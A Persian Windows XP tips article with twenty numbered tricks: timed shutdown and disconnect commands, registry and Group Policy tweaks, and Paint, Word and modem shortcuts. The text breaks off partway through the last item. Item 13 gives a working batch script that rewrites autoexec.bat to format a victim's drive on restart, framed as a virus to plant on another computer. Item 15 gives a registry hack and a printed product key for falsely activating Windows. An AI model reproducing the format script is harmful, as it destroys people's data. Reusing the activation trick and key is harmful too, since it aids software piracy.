بسم الله الرحمن الرحیم | امروز: جمعه 31 فروردین 1403

موقعیت فعلی: بخش مقالات (برگشت به لیست)

با این ترفند ها چه کارها که نمیشه کرد!!! نظرات خوانندگان(1)
لید مقاله:

حتما برای شما نیز پیش آمده است که قصد داشته باشید در زمان خاصی ، و به صورت اتوماتیک ازتباط خود را از اینترنت قطع کنید. به عنوان مثال بخواهید پس از دانلود نرم افزاری و پس از انجام عمل دریافت ویندوز به صورت اتوماتیک ارتباط شما را از اینترنت قطع کند. با استفاده از این ترفند میتوانید انجام کلیه این عمل ها را میسر سازید.

برای انجام این کار ابتدا برنامه Notepad را باز کنید، سپس متن زیر را در آن تایپ نمایید :


متن کامل:

حتما برای شما نیز پیش آمده است که قصد داشته باشید در زمان خاصی ، و به صورت اتوماتیک ازتباط خود را از اینترنت قطع کنید. به عنوان مثال بخواهید پس از دانلود نرم افزاری و پس از انجام عمل دریافت ویندوز به صورت اتوماتیک ارتباط شما را از اینترنت قطع کند. با استفاده از این ترفند میتوانید انجام کلیه این عمل ها را میسر سازید.

برای انجام این کار ابتدا برنامه Notepad را باز کنید، سپس متن زیر را در آن تایپ نمایید :

rundll32 iedkcs32.dll,CloseRASConnections

در تایپ آن به فواصل میان کلمات و علائم دقت کنی و یا بهتر است که آن را مسقیما کپی نمایید.سپس از منوی فایل گزینه Save را انتخاب کرده و در یک مسیر دلخواه ( و مشخص ) آن را با نامی دلخواه و فقط با پسوند bat. ذخیره کنید.برای مثال autodisconnect.bat و سپس از برنامه Notepad خارج شوید.
بعد از این کار برنامه Scheduled Tasks را به یکی از طرق زیر باز کنید :
1) از منوی Start ابزار Run را اجرا کرده و در آن تایپ کنید control schedtasks و سپس Enter را بزنید.
2) مسیر زیر را برای رسیدن به برنامه و اجرای آن طی کنید :

Start --> All Programs --> Accessories --> System Tools --> Scheduled Tasks

در پایان فایل autodisconnect.bat را در آن وارد کرده و از نظر زمانی آن را تنظیم کنید.


2-ایجاد یک شورتکات برای قفل کردن کامپیوتر

تا حالا به این فکر کردید که با ایجاد یک فایل شورتکات به راحتی و با سرعت بیشتر از حالت عادی کامپیوتر خود رو به حالت Lock ببرید ؟

برای انجام این کار بر روی صفحه نمایش خود Right-Click کنید و از Shortcut گزینه ی New را انتخاب کنید.
سپس در پنجرهای که ظاهر می شود در قسمت Type the location of the item فرمان زیر را کپی کنید :

rundll32.exe user32.dll,LockWorkStation

بعد از این کار Next را بزنید و نام Shortcut را وارد کنید و در آخر دکمه ی Finish را بزنید.
حال برای آزمایش می تونید اونو اجرا کنید. می بینید که کامپیوتر به حالت قفل شدن رفته است.


3-عکس گرفتن با مدیا پلیر و خواب خرگوشی در ویندوز اکس پی

عکس گرفتن با مدیا پلیر : شاید تا بحال با نرم افزارهای دیگری این کار را انجام می دادید ولی در حقیقت با خود مدیا پلیر ویندوز نیز می توان عکس گرفت. برای این کار کافیست در حین پخش فیلم کلیدهای Ctrl +I را بزنید. پنجره ذخیره تصویر باز می شود.حالا می توانید تصویر گرفته شده را ذخیره کنید.

HIBERNATE در ویندوز XP : زمانی که سیستم را خاموش می کنید و یا به هر دلیلی میخواهید از ویندوز خارج شویدحتما از شما درباره ذخیره برنامه ها سؤال می شود.نکته جالب توجه در ویندوز XP خروج از آن بدون ذخیره اطلاعات است.در این صورت شما می توانید برنامه ها را در هر حالتی که هستند رها کرده و از ویندوز خارج شوید.مجدد که وارد محیط ویندوز می شوید می بینید که هیچ چیز دست نخورده و برنامه ها به همان شکل باقی مانده اند حالا شما می توانید به کارتان ادامه دهید!!! ( حتی پنجره ها باز مانده اند )
این حالت را اصطلاحا HIBERNATE میگویند.برای فعال کردن آن از منوی استارت به کنترل پنل رفته و Power Options را باز کنید سپس در سربرگ Hibernate گزینه Enable Hibernation را فعال کنید و تنظیمات را تایید کنید.حال منوی استارت را باز کرده و turn of computer را انتخاب کنید. در صفحه باز شده دکمه shift را بزنید.میبینید که گزینه standby به hibernate تغییر پیدا می کند.برای بردن کامپیوتر به این حالت دکمه shift را نگه داشته و روی hibernate کلیک کنید.


4-ا استفاده از این ترفند شما قادرید کامپیوتر خود را در یک زمان خاص و بدون استفاده از هیچ گونه نرم افزاری خاموش کنید ، فقط با یک خط کد در خط فرمان (command prompt).

برای اینکار:
از منوی Start وارد Run شده و عبارت زیر را وارد نمایید:

Shutdown -s -t TIME

دقت کنید که به جای عبارت TIME زمان دلخواهی که میخواهید سیستم پس از آن خاموش شود را بر حسب ثانیه وارد نمایید.به عنوان مثال قصد داریم تا کامپیوتر یک ساعت دیگر به شکل اتوماتیک خاموش شود ، برای این کار کافی است عبارت Shutdown -s -t 3600 را در Run وارد نموده و نهایتأ Enter بزنیم.پس از این کار خواهید دید پنجره ای باز خواهد شد که تایمر آن تا زمان به صفر رسیدن و خاموش کردن سیستم کار خواهد کرد.

برای راه اندازی مجدد کامپیوتر (restart) هم میتوانید از دستور زیر بهره بگیرید:

Shutdown -r -t TIME

برای متوقف کردن تایمر هم میتوانید دستور زیر را در Run وارد کنید:

Shutdown -a

اگه یادتون باشه ، حدود ۳ سال پیش ویروسی تو اینترنت منتشر شده بود که سیستم را بعد از ۶۰ ثانیه shutdown میکرد و اگه گرفتارش می شدین یا مجبور بودید خاموش شدن سیستم رو ببینید یا اینکه با کد بالا عملیات shutdown را لغو می کردید.


5-ایکون های اضافه و بی کاربرد کنترل پنل را حذف کنید

حتما برای شما هم پیش آمده که بعد از نصب برنامه خاصی متوجه شده اید که یک آیکن خاص مربوط به آن برنامه در Control Panel قرار میگیرد !
بله درسته. بعضی از برنامه ها بعد از نصب در Control Panel یک آیکن ایجاد میکنند که به نحوی مربوط به تنظیمات خاص آن برنامه است. اما بسیاری از این دسته از برنامه ها بعد از Uninstall شدن زحمت حذف کردن این آیکن را از Control Panel به خودشان نمیدهند.این کار باعث میشود که بعد از مدتی حجم زیادی از آیکن های بی مصرف و زائد Control Panel را اشغال کنند که همین امر باعث سردرگمی کاربر میشود.
با این آموزش شما خواهید آموخت که چگونه میتوان از شر این آیکن های مزاحم در Control Panel خلاص شد. برای این منظور ابتدا از طریق منوی Start برنامه Search را اجرا کنید.
سپس با استفاده از گزینه All Files and Folders عبارت cpl.* را جستجو کنید ( البته در درایو مربوط به ویندوز ، اگر هم دقیق تر بخواهید پوشه Windows ).
سپس از میان نتایج جستجو آن فایلی را که نامی مشابه آن برنامه خاص دارد را پاک کنید. در این مرحله شما باید کاملا دقت کنید زیرا که اگر برای مثال فایلی را بدون اطلاع کافی پاک کنید ممکن است یکی از آیکنهای مورد نیاز در Control Panel را به اشتباه پاک کنید. برای مثال اگر فایل sysdm.cpl را به اشتباه پاک کنید آنوقت آیکن System که برای دسترسی به System Properties است از Control Panel پاک میشود. معمولا آیکن هر برنامه خاصی در Control Panel یک قسمت از نام آن برنامه را در خودش دارد و به همین طریق میتوان آنها را شناخت ( یا ممکن است خلاصه شده نام برنامه باشد ).
بعد از پاک کردن آن فایل و Restart سیستم دیگر آن آیکن مزاحم را در Control Panel نخواهید دید.


6-ازگرداندن فایلهای معیوب سیستمی

چون خیلی از دوستان از ویندوز 98 در کنار XP استفاده می کنند ابتدا :
در ویندوز 98 : کافی است در Run تایپ کنید sfc و Enter را بزنید. بعد در صفحه ای که باز میشود روی دکمه Start کلیک کرده و منتظر بمانید تا برنامه فایلها را چک کند. هر جا که فایل معیوبی پیدا شد برنامه از شما میخواهد تا CD ویندوز را در CD-Rom قرار دهید تا فایل معیوب را جایگزین فایل سالم کند. و در نهایت هم با یک Restart کار تمام میشود.

در ویندوز XP : خیلی ها فکر میکنند که دستور sfc در ویندوز XP وجود ندارد و مجبورند از برنامه Dr.Watson استفاده کنند. در صورتی که باید بگم این دستور در ویندوز XP هم وجود دارد اما نحوه اجرای آن با قبلی فرق میکند. برای این کار ابتدا در قسمت Run تایپ کنید cmd و Enter را بزنید تا وارد محیط Command Prompt شوید. بعد در آنجا وارد زیر شاخه زیر شوید : c:\windows\system32

حالا در این قسمت تایپ کنید : sfc /scannow و بعد Enter را بزنید. در این لحظه از شما درخواست میشود که CD ویندوز XP را درون درایو قرار دهید و بعد دکمه Retry را فشار دهید. بعد برنامه تمام فایلهای سیستمی شما را چک میکند و به طور اتوماتیک فایلهای معیوب را تعویض میکند.


7-

یافتن لینک ها در نمایشگر اینترنت
در صورتی که ماوس را در صفحات اینترنت بر روی برخی از عکسها و یا نوشته ها حرکت دهیم به شکل دست تغییر شکل میدهد که اصطلاحاً لینک نامیده می شود. پیدا کردن لینک های یک صفحه اینترنت و یا حرکت از یک لینک به لینک دیگر بدون استفاده از ماوس با زدن یک ضربه بر روی دگمه TAB میسر می شود. استفاده همزمان از کلیدهای Shift + TAB لینک قبلی را پیدا خواهد کرد.

دانستن نام و دنباله فایل ها
با انتقال آیکون هر فایل به داخل پنجره Run نه تنها نام فایل بلکه کلیه اطلاعات مربوط به محل بایگانی و نام شامل دنباله فایل نیز دیده خواهد شد.

بایگانی و بستن همزمان چندین فایل باز در ورد
معمولاً برای بایگانی و یا خروج از چندین فایل باز باید هر یک از آنها را به تنهایی بست. اگر چندین فایل همزمان باز است قبل از خارج شدن کلید Shift را نگاهداشته و منوی مایکروسافت ورد را کلیک کنید. دو انتخاب دیگر به نامهای Close All و Save All به منوی فایل اضافه میشود و با استفاده از آنها میتوان تمام فایلها را همزمان بست و یا بایگانی کرد.

خاموش کردن کامپیوتر با دستورات خط فرمان command line
ابتدا یک اسم برای کامپیوتر خود انتخاب کنید سپس از My Computer Control Panel آیکون System را کلیک کنید. در محل مشخصات و نام کامپیوتر این دستور را تایپ کرده و با فشار دادن دکمه OK از آن خارج شوید. کامپیوتر شما پس از آن برای خاموش کردن نیز به دانستن اسم نیاز خواهد داشت.
Shutdown -r -m computer name -t 300 ا متغیرهای این دستور به این صورت است:
Computer name = اسم کامپیوتر که شما آن را انتخاب کرده‌اید
R=Restart, S=Shutdown, L=Log off
T300 نشان دهنده زمان خاموش شدن اتوماتیک به ثانیه است و میتواند با عدد دیگری جایگزین شود.
جلوگیری از قطع شدن مودم
ارتباط با اینترنت اگر با خطوط تلفن و مودم ایجاد شده باشد به دلایل گوناگون قطع و وصل خواهد شد. انجام تغییر کوچکی در تنظیم مودم سبب خواهد شد تا مودم در صورت عدم دریافت علائم مخابراتی از کامپیوتر پس از گذشت 50 ثانیه فعال شده و از قطع ارتباط جلوگیری نماید.
ویندوز 98 یا ME:

Control Panel >Modem >General >Properties >Connection > Advanced

سپس در قسمت Extra Settings کد S10=50 را وارد کنید.
ویندوز XP:

Control Panel >Phone and Modem Options >Modem >Properties >Advanced

سپس در بخش Extra Settings کد S10=50 را وارد کنید. در صورتی که در قسمت Setting کد دیگری دیده میشود کد جدید را باید با تایپ یک کاما از کد قبلی جدا کرد.


8-

در این مقاله درباره موضوعی بحث خواهم کرد که برای افرادی که از شبکه خانگی و یا اداری استفاده میکنند بسیار مفید میباشد. زمانی که شما در ویندوز XP از My Network Places برای مرور سایر سیستمهای موجود در شبکه خود استفاده میکنید ، ممکن است مدت زمان نسبتا طولانی را برای مشاهده لیست منابع اشتراکی در بین سیستم های شبکه منتظر بمانید. علت این امر در ویندوز XP بررسی وظایف زمانبندی ( Scheduled Tasks ) هر یک از سیستمهای تحت شبکه قبل از مدیریت و لیست نمودن منابع اشتراکی هر یک از این سیستمها میباشد.
این بررسی معمولا نیاز نمیباشد و در شرایط عادی واقعا نیازی به آن نیست ، جالب است بدانید همین بررسی بی مورد زمانی در حدود 30 ثانیه نیاز دارد و این تاخیر برای بسیاری از کاربران کسالت آور میباشد و ممکن است کاربر را به مشکلات سخت افزاری و ... مشکوک نماید.
شما قادر هستید با یک ترفند ساده رجیستری این بررسی بی مورد را غیر فعال نمایید و به این ترتیب دیگر شاهد این تاخیر طولانی نباشید. برای این منظور و در صورتی که از شبکه خانگی و یا اداری استفاده میکنید با ادامه مقاله همراه باشید.
ابتدا از طریق منوی Start و ابزار Run ، ابزار Regedit را اجرا نمایید.
مسیر زیر را در آن بیابید :


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Remote Computer\NameSpace

در زیر مجموعه کلید NameSpace کلیدی با نام {D6277990-4C6A-11CF-8D87-00AA0060F5BF} وجود دارد.
اگر به صفحه سمت راست دقت نمایید مشاهده خواهید کرد که مقدار کلید Default در آن برابر Scheduled Tasks میباشد که نشانگر همان بررسی با تاخیر میباشد.
بر روی کلید {D6277990-4C6A-11CF-8D87-00AA0060F5BF} راست کلیک نموده و گزینه Delete را انتخاب نمایید و این کلید را از مسیر ذکر شده حذف نمایید.
برای اطمینان بیشتر میتوانید قبل از حذف این کلید آن را با کمک گزینه Export در مسیری مطمئن بر روی هارد دیسک خود ذخیره نمایید و نسخه پشتیبانی از آن در اختیار داشته باشید.
برای اعمال تغییرات از رجیستری خارج شده و در صورت نیاز سیستم خود را از نو راه اندازی نمایید.
به این ترتیب پس از اعمال این ترفند دیگر شاهد آن تاخیر نسبتا طولانی نخواهید بود


9-با این ترفند ویندوز می توانید Task Manager را فعال و یا غیر فعال کنید برای اینکار در Run عبارت gpedit.msc را تایپ کنید و ok را بزنید تا پنجره Group Policy باز شود در سمت چپ این پنجره و از شاخه User Configuration گزینه Administrative Templates ، سپس وارد گزینه system و از زیر شاخه های آن گزینه Ctrl+Alt+Del Options را انتخاب کنید در قسمت راست پنجره گزینه هایی را می بینید که از بین این گزینه های روی Remove Task Manager دبل کلیک کنید . سپس شما با گذاشتن تیک Enabled می توانید Task Manager را غیر فعال کنید در این حالت وقتی کلید های Alt+Ctrl+Del بصورت همزمان فشرده شوند پیام زیر ظاهر می شود : Task Manager has been disabled by your administrator. برای فعال کردن مجدد Task Managerمی توانید گزینه Disable را تیک بزنید.


10-

گر از طرفداران استفاده از Windows Media Player هستید ، حتما با این مشکل در این برنامه برخورد کرده اید که Media Player بطور پیش فرض فایل های ویدیویی DAT را در لیست فایل ها نمایش نمی دهد و باید برای نمایش و باز کردن آن ها از قسمت Files Of Type گزینه ی All Files را انتخاب کنیم تا همه فایل ها بدون توجه به پسوندی که دارند ، نمایش داده شوند . جهت حل مشکل و افزودن این قابلیت به Media Player می بایست مراحلی را انجام دهید :
Regedit را اجرا کنید ( از طریق منوی Start و سپس انتخاب گزینه ی Run و تایپ Regedit در آن ) پس از باز شدن پنجره و ورود به محیط رجیستری ، کلید زیر را در آن بیابید :

HKEY_LOCAL_MACHINE [ SOFTWARE ] [ Microsoft ] [ MediaPlayer ] [ Player ][ Extensions ]

حال بر روی Type کلیک کنید و در پنل سمت راست ، روی عدد 3 دو بار کلیک کرده تا پنجره ی Edit String باز شود . سپس در انتهای قسمت Value date ابتدا یک سمیکولن ( Semicolon ) و سپس عبارت *.dat را اضافه کنید . Regedit را ببندید و نتایج حاصله را بر روی ویندوز مدیا پلیر مشاهده کنید .


11-قابلیت های پنهان و جالب نرم افزار پینت ویندوز

همگی کاربران چه مبتدی و چه پیشرفته ، مطمئنأ نرم افزار Paint یا همان نقاشی ویندوز را میشناسند. همگی زمانی را به تفریح صرف این برنامه کوچک کرده ایم. اما با آمدن نرم افزارهای حرفه ای ویرایش عکس همچون Corel ، Photoshop و ... این برنامه دیگر کاملأ به یک نرم افزار ابتدایی تبدیل گشته است. اما پیشنهاد میکنیم این نرم افزار را اصلا دست کم نگیرید! چرا که توانایی بسیار جالبی در این برنامه وجود دارد که تاکنون از دید شما پنهان مانده است. با استفاده از ترفندهای مخفی که اکنون به شما معرفی خواهیم کرد میتوانید اعمالی را با Paint انجام دهید که جزء ویژگیهای نرم افزارهای حرفه ای ویرایش تصویر است. این ترفند را اکیدأ به شما پیشنهاد میکنیم.

ابتدا برای اجرا کردن برنامه Paint ، از منوی Start و سپس All Programs وارد Accessories شده و Paint را انتخاب کنید.

پس از باز شدن برنامه ، از منوی File ، گزینه Open را انتخاب کنید. سپس در پنجره جدید باز شده یک عکس را برای نمونه انتخاب کرده و روی دکمه Open کلیک نمایید.
حالا عکس مورد نظر شما در برنامه باز شده است.

مهر زدن قطعه ای از عکس
در Paint قابلیت مخفی وجود دارد که با استفاده از آن میتوانید قطعه ای از عکس را همانند مهر کردن تکرار کنید.
برای این کار در داخل نوار ابزار برنامه ، ابزار Select را انتخاب کنید (مستطیل نقطه چین). سپس بر روی قسمتی از عکس با استفاده از موس یک مستطیل ایجاد کنید. اکنون دست خود را روی دکمه Ctrl نگه دارید و مستطیلی را که ایجاد کردید جابجا کنید و رها کنید. همواره دستتان که روی دکمه Ctrl است این عمل را ادامه دهید تا قطعه عکس انتخاب شده همانند عمل مهر زدن تکرار گردد.

ساییدن قطعه ای از عکس
با استفاده از این قابلیت مخفی ، میتوانید قطعه ای از عکس را همانند عمل ساییدن روی کل عکس بکشانید.
برای این کار در داخل نوار ابزار برنامه ، ابزار Select را انتخاب کنید (مستطیل نقطه چین). سپس بر روی قسمتی از عکس با استفاده از موس یک مستطیل ایجاد کنید. اکنون دست خود را روی دکمه Shift نگه دارید و مستطیلی را که ایجاد کردید جابجا کنید. ( ترفندستان ) تا زمانی که دستتان روی دکمه Shift باشد این عمل تکرار خواهد شد.

کوچک و بزرگ کردن قطعه ای از عکس
قابلیت مخفی دیگری که در Paint وجود دارد کوچک و بزرگ کردن قطعه ای از عکس به شکلی است که دیگر اجزای عکس تغییری نکند.
برای این کار در داخل نوار ابزار برنامه ، ابزار Select را انتخاب کنید (مستطیل نقطه چین). سپس بر روی قسمتی از عکس با استفاده از موس یک مستطیل ایجاد کنید. اکنون دست خود را روی دکمه Ctrl نگه دارید و یکی از دکمه های + و - را بزنید. دکمه های Ctrlو+ عکس قطعه انتخابی را بزرگ و دکمه Ctrlو- قطعه انتخابی را کوچک میکند.
لازم به ذکر است که این ترفند را میتوانید روی تمامی ابزارهای ایجاد نقاشی نیز اجرا کنید. به فرض مثال در نوار ابزار ، ابزار Brush (قلم مو) را انتخاب نمایید. اکنون دست خود را روی دکمه های Ctrl و + نگاه دارید تا نقطه بزرگتر شود.



12-چند ترفند ویندوزی مفید و جالب
1. اگر می خواهید مرورگرتان با آدرس مورد نظر شما اجرا شود و مستقیما به سایت دلخواه تان برود، فقط کافی است آدرس سایت را در منوی Run تایپ کرده و کلید Enter را بزنید. به طور مثال http://www.yahoo.com./

2. همه منوهای ویندوز، کلیدهای میانبر دارند که از ترکیب کلید Alt با یکی از حروف موجود در نام آن منو، ساخته شده است. در حالت عادی بازدن کلید Alt، این حروف میانبر، با یک زیر خط مشخص می شوند. به منظور نمایش دائمی این زیرخط ها، با کلیک راست روی میز کار و انتخاب گزینه Properties از منوی ظاهر شده، به زبانه Appearance بروید. در ادامه دکمه Effects را کلیک کرده و علامت گزینه Hide underline letters for keyboard navigation until press the [Alt] key را بردارید.

3. اگر می خواهید با زدن کلید Caps Lock، Num Lock یا Scroll Lock، صدایی از کامپیوترتان پخش شود، کنترل پنل را باز کرده، به قسمت Accessibility رفته و گزینه Togglekeys را فعال کنید.

4. در ویندوز XP، با نگه داشتن کلید Shift در پنجره Turn off computer، دکمه Standby به Hibernate تبدیل می شود. Hibernation یا خواب زمستانی، وضعیتی است که در آن، کامپیوتر قبل از خاموش شدن، محتویات حافظه را روی هارد دیسک ذخیره می کند و یا هنگام راه اندازی مجدد، ویندوز را با همان وضعیت قبلی بالا می آورد.

5. اگر ویژگی Hibernate روی ویندوز شما فعال نیست، برای فعال کردن آن، قسمت Power Options را از کنترل پنل باز کرده و به زبانه Hibernate بروید. اگر چنین زبانه ای وجود ندارد، دلیل آن، عدم پشتیبانی سخت افزار کامپیوترتان از این ویژگی است. در زبانه Hibernate گزینه Enable hibernation را فعال کرده و دکمه OK را کلیک کنید.



13-ساختن یک فایل خطرناک و مخرب برای فرمت کردن درایو هارد دیسک

با اجرای این فایل خطرناک که طرز ساختنش رو بهتون می گم یکی از درایو های کامپیوتر قربانی (که خودتون توی ویروستون مشخص می کنید) فرمت میشود . برای این کار Notepad را باز کزده و کد زیر را در آن تایپ کنید .

echo off@
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit

حالا فایل را با نام دلخواه ولی با پسوند( bat ) ذخیره کنید ( مثلا با نام isis.bat ) .اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.

نکات زیر را مد نظر داشته باشید :

عبارتی که شما کپی کردید برای فرمت درایو C میباشد ، برای تعویض آن کافی است در خطوط 2 و 3 و 4 و 5 در جایی که نوشته است :c به جای c نام درایو مورد نظر را بنویسید.
دقت هم کنید که ابدا به روی فایلی که ساخته اید کلیک نکنید چون درایو خودتون فرمت خواهد شد .

روش کار این فایل بدین شکل است که ابتدا محتویات فایل autoexe.bat که یک فایل ویندوزی است را پاک میکند و سپس کد ' format /autotest c:/q ' را در داخلش جایگزین میکنه ، به همین سبب پس از رستارت کامپیوتر درایو شما فرمت میشود.



14-محدود کردن دسترسی به رجیستری ویندوز

همانطور که می دانیم دسترسی یک کاربر ساده به Registry چقدر ما را به دردسر خواهد انداخت پس محدود کردن دسترسی به Registry بر روی یک سیستم میتواند بسیار کارگشا باشد:
1- ابتدا ویرایشگر Group Policy را با اجرای gpedit.msc در خط فرمان فرا بخوانید
2- به مسیر زیر بروید:

user configuration/Administrative Templates/system

۳-در سمت راست پنجره گزینه Prevent access to registry editing tools را پیدا کنید و آنرا Enable کنید.



15-اوریجینال کردن ویندوز اکس پی با یک ترفند ساده رجیستری

برای اینکه WindowsXP را اوریجینال بکنبد تا در نصب بعضی آپدیت های مایکروسافت (نصب اینترنت اکسپلورر۷ ، مدیا پلیر ۱۱)مشکل نداشته باشید کافیست یک ترفند ساده رجیستری را اجرا کنید ، مراحل اوریجینال کردن ویندوز اکس پی :

1. ابتدا از منوی Start گزینه Run را اجرا کنید regedit رو بنویسید و روی OK کلیک کنید تا پنجره ای جدید باز شود.

2. حالا از پنجره باز شده به آدرس زیر برین:

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/WPAEvents

3. از قسمت راست پنجره، روی OOBETimer دوبار کلیک کنید تا پنجره ای باز شود.

4. مقدار FF را در مقدار بالا فقط به 00 تغییر دهید. روی دکمه OK کلیک کنید و رجستری را ببندید.

5. منوی Start گزینه Run کلیک کنید و این دستور را بنویسید:

C:\WINDOWS\system32\oobe\msoobe.exe /a

6. پنجره ای باز می شود به نام Activate Windows، گزینه دوم را انتخاب کنید و بعد Next را کلیک کنید.

7. از پنجره جدید بر روی Change Product keyکلیک کنید.

8. در قسمت New key
B7R7P - J63JP - 2J7VH - W3TDJ - PDP7T
و سپس بروی Update کلیک کنید در صورت لزوم یکبار ویندوز را Restart کنید.



16-فارسی کردن ویندوز با کمک رجیستری ویندوز

در این ترفند قصد داریم روشی بسیار جالب را به شما معرفی کنیم که با استفاده از آن خودتان میتوانید بدون نیاز به اطلاعات پیچیده کامپیوتری و نرم افزار خاصی و تنها از طریق رجیستری ویندوز قسمتهای اساسی ویندوز را فارسی کنید. این ترفند روی تمامی نسخه های ویندوز قابل اجراست.

برای این کار:
از منوی Start وارد Run شوید و در آن عبارت regedit را وارد کنید و Enter بزنید تا ویرایشگر رجیستری باز شود.
اکنون به آدرس زیر بروید:


/HKEY_USERS/S-1-5-21-515967899-1454471165-839522115-1003/Software/Microsoft Windows/ShellNoRoam/MUICache

حالا در قسمت دیگر رجیستری ، شما میتوانید تمامی اطلاعات زبان را مشاهده کنید. کافی است روی هر کدام از آنها دوبار کلیک کنید و در پنجره جدید و قسمت Value Data به جای نام انگلیسی آن ، نام فارسی مورد نظر خودتان را بنویسید. نهایتأ OK را بزنید تا تغییرات اعمال شود.



17-هفت ترفند مفید و جالب برای نرم افزار مایکروسافت ورد

هفت ترفند مفید در نرم افزار Word
با بکار بستن ترفندهای زیر در کار خود با نرم افزار Word سرعت بخشید :

1- اگر در حال تایپ کردن یک متن انگلیسی هستید و به دنبال مترادف یک کلمه خاص می گردید ، کافیست نشانگر را در کنار و یا در زیر کلمه مربوطه ببرید و کلیدهای Shift + F7 را فشار دهید.با این کار فهرستی از کلمات مترادف آن کلمه خاص نمایش داده میشود.

2- اگر فرمت قسمتی از متن را تغییر داده اید ، مثلا رنگ یا نوع فونت آن را عوض کرده اید و حالا میخواهید به همان وضعیت پیش فرض Word برگردانید ، میتوانید آن بخش از متن را انتخاب و کلیدهای Ctrl + SpaceBar را فشار دهید.

3- وقتی میخواهید بخشی از متن را انتخاب کنید ، میتوانید کلمه Alt را پائین نگه دارید و با ماوس Drag کنید.این کار باعث می شود عمل انتخاب به صورت مستطیل شکل انجام شود و سرعت شما به طرز چشمگیری افزایش یابد.

4- با فشردن کلید Shift + F5 میتوانید به قسمتی از متن که بتازگی تغییری در آن ایجاد کرده اید بروید.فشردن مجدد این کلیدها شما را به قسمتهای تغییر یافته قبلی متن میبرد.


5- در پنجره Print Preview شما میتوانید پیش از پرینت گرفتن ، پیش نمایشی از فایل خود را ببینید.اگر در همین پنجره بخواهید تغییراتی در متن بدهید ، کافیست روی آیکون Magnifier کلیک کنید تا اجازه تصحیح در متن به شما داده شود.

6- اگر میخواهید همزمان دو بخش مختلف از یک Document را ببینید ، میتوانید فایل مربوطه را در نرم افزار Word باز کرده ، ماوس را بالای فلش موجود در بالای نوار لغزان نگه دارید تا نشانگر ماوس به شکل دو خط موازی با دو فلش در بالا و پائین آن درآید.آنگاه کلیک کنید و بدون رها کردن ماوس آن را به سمت پائین بکشید.حال صفحه به دو قسمت تقسیم میشود که در هر دو بخش همان فایل نمایش داده میشود و همزمان میتوانید دو بخش مختلف فایل را ببینید و ویرایش کنید.

7- اگر فایلتان بزرگ است و پیدا کردن مطالب برایتان دشوار است ، کافیست گزینه Document Map را از منوی View انتخاب کنید تا فهرستی از عناوین Document شما را نشان دهد.حال با کلیک بر هر عنوان به آن قسمت از فایل خود پرش میکنید.



18-تعدد شماره های اتصال به شبکه تامین کننده اینترنت خود را حل کنید

شاید شرکت تامین کننده خدمات اینترنتی شما هم برای اتصال مشترکان خود چندین شماره را در نظر گرفته و شما با اشغال بودن یکی به دیگری رجوع میکنید. اگر این طور باشد بهتر است از گزینه جدید در نظر گرفته شده در سرویس Dial-Up ویندوز 2000 و XP استفاده کنید تا هر بار مجبور نباشید شماره را مجددا وارد کنید.
با کمک گزینه Alternates شما میتوانید تمامی شماره های ISP خود را وارد کنید و سیستم با اشغال بودن یک شماره به بصورت خود کار شماره بعدی را آزمایش میکند و شماره ای را که با آن بصورت موفقیت آمیز به شبکه وصل شده است را در سطر لیست قرار میدهد تا دفعه بعد شماره آغاز کننده باشد. بدین ترتیب شماره ای که با منطقه و مودم شما سازگاری بیشتری دارد بعد از مدتی شماره دائمی شما خواهد شد و دسترسی شما به اینترنت بهبود میبخشد.
مراحل زیر را جهت وارد کردن شماره های جایگزین طی کنید:

1- در ویندوز 2000 به Start>Settings بروید و سپس Network and Dial-Up Connections را انتخاب کنید و بر روی تماس مورد نظرتان Double-Click کنید. و در ویندوز XP به Start>Connect to بروید و تماس مورد نظر تان را انتخاب کنید.
2- دکمه Properties را بزنید.
3- حالا دکمه Alternates را بزنید.
4- با زدن دکمه Add میتوانید تمام شماره های مورد نظرتان را وارد کنید و در صورت لزوم هر کدام از دو گزینه پایین پنجره را متناسب با شرایط خود فعال کنید.

همه ISP ها شماره های تماس جدید را در وب سایت خود اعلام میکنند لذا سعی کنید هر چند وقت یکبار به وب سایت تامین کننده خدمات اینترنت خود مراجعه کنید.



19-بالا بردن سرعت اینترنت و دانلود بدون نرم افزار

تا حالا شده از سرعت پایین اینترنت و دانلود ناراضی باشید ؟ مسلما جواب اکثر کاربرایی که از Dial Up استفاده میکنند "بله" هست.این توضیحات در مورد ویندوز XP هستند و بر روی سیستم عامل ایکس پی تست شده اند.

استارت منو را کلیک کنید بعد کنترل پنل را باز کنید در پنجره کنترل پنل روی ایکون Phone and Modem Options کلیک کنید تا پنجره مربوطه باز شود در این پنجره به سربرگ Modems رفته و مودم خود را انتخاب کنید دقت کنید که اگر در این پنجره چند گزینه دارید و نوع مودم خود را هم نمیدونید ببینید کدام گزینه با Com3 معرفی شده همان گزینه را انتخاب کنید بعد کلید Properties را بزنید تا پنجره مربوط به مودمتان باز شود در این پنجره به سربرگ Advanced بروید و در کادر Extra initialization commands عبارت AT&FX را با حروف بزرگ تایپ کنید سپس پنجره های باز شده را ok کنید .

تا اینجا مربوط به سرعت اینترنت بود ادامه مطلب مربوط میشه به سرعت دانلود ...

برای بالا بردن سرعت دانلود ابتدا استارت منو را باز کرده سپس بر روی کنترل پنل کلیک کنید تا پنجره کنترل پنل باز شود در این پنجره بر روی ایکون Display کلیک کنید تا پنجره Display Properties باز شود سپس در این پنجره به سربرگ Desktop رفته و کلید Customize Desktop را بزنید تا پنجره Desktop Items باز شود در این پنجره به سربرگ Web رفته و کلید Properties را بزنید تا پنجره My Current Home Page Properties باز شود در این پنجره به سربرگ Download بروید و گزینه Limit hard-disk usage for this page to را فعال کرده و مقدار عددی آن را از 500 به 5000 تغییر دهید .

حالا به اینترنت وصل شوید و سرعت اینترنت خود را امتحان کنی



20-تنظیم وضغیت نام لوک دز زمان ورود به ویندوز

اگر با هر بار ورود به ویندوز XP / 2000 / NT کلید Num Lock صفحه کیبوردتون خاموش است، کامپیوترتون رو بیخودی دستکاری نکنید !

تنظیم این کار مربوط به ( رجیستری ) ویندوز می شود . برای رفع این مشکل وارد برنامه REGEDIT شوید و کلید زیر را پیدا کنید :

[HKEY_Current_UserControl PanelKeyboard]

